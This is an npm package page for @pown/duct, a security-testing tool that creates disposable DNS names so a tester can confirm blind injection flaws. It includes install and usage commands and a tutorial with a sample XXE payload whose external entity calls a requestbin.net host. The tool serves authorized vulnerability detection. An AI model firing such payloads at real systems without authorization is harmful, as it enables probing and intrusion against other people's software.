@pown/duct

2.1.0 • Public • Published

Follow on Twitter NPM Fury

Pown Duct

Essential tool for finding blind injection attacks.

Credits

This tool is part of secapps.com open-source initiative.

  ___ ___ ___   _   ___ ___  ___
 / __| __/ __| /_\ | _ \ _ \/ __|
 \__ \ _| (__ / _ \|  _/  _/\__ \
 |___/___\___/_/ \_\_| |_|  |___/
  https://secapps.com

NB: This tool is taking advantage of requestbin.net service. Future versions will use a dedicated, custom-built infrastructure.

Quickstart

This tool is meant to be used as part of Pown.js but it can be invoked separately as an independent tool.

Install Pown first as usual:

$ npm install -g pown@latest

Invoke directly from Pown:

$ pown duct

Otherwise, install this module locally from the root of your project:

$ npm install @pown/duct --save

Once done, invoke pown cli:

$ ./node_modules/.bin/pown-cli duct

You can also use the global pown to invoke the tool locally:

$ POWN_ROOT=. pown duct

Usage

pown duct <command>

Side-channel attack enabler

Commands:
  pown duct dns  DNS ducting

Options:
  --version  Show version number  [boolean]
  --help     Show help  [boolean]

pown duct dns

pown duct dns

DNS ducting

Options:
  --version  Show version number  [boolean]
  --help     Show help  [boolean]
  --channel  Restore channel  [string]
  --output   Output format  [string] [choices: "string", "hexdump", "json"] [default: "string"]

Tutorial

There are cases when we need to perform an attack such as sql injection, XSS, XXE or SSRF but the target application is not providing any indication that it is vulnerable. One way to be sure if vulnerable is to try to inject a valid attack vector which forces a DNS resolver to ask for an attack controlled domain. If the resolution is successful, the attack will be considered successful.

NOTE: You might be familiar with Burp Collaborator which provides a similar service for profesional usage.

First, we need a disposable dns name to resolve:

$ pown duct dns

Using the provided DNS, compose your payload. For example, the following could trigger trigger DNS resolution if XXE vulnerability is present.

<!DOCTYPE foo [
<!ELEMENT foo ANY>
<!ENTITY bar SYSTEM
"http://showmethemoney.f92839570333a5d62743.d.requestbin.net">
]>
<foo>
&bar;
</foo>

If the attack was successful, we will get a message in the terminal.

/@pown/duct/

    Package Sidebar

    Install

    npm i @pown/duct

    Weekly Downloads

    0

    Version

    2.1.0

    License

    MIT

    Unpacked Size

    6.35 kB

    Total Files

    7

    Last publish

    Collaborators

    • pdparchitect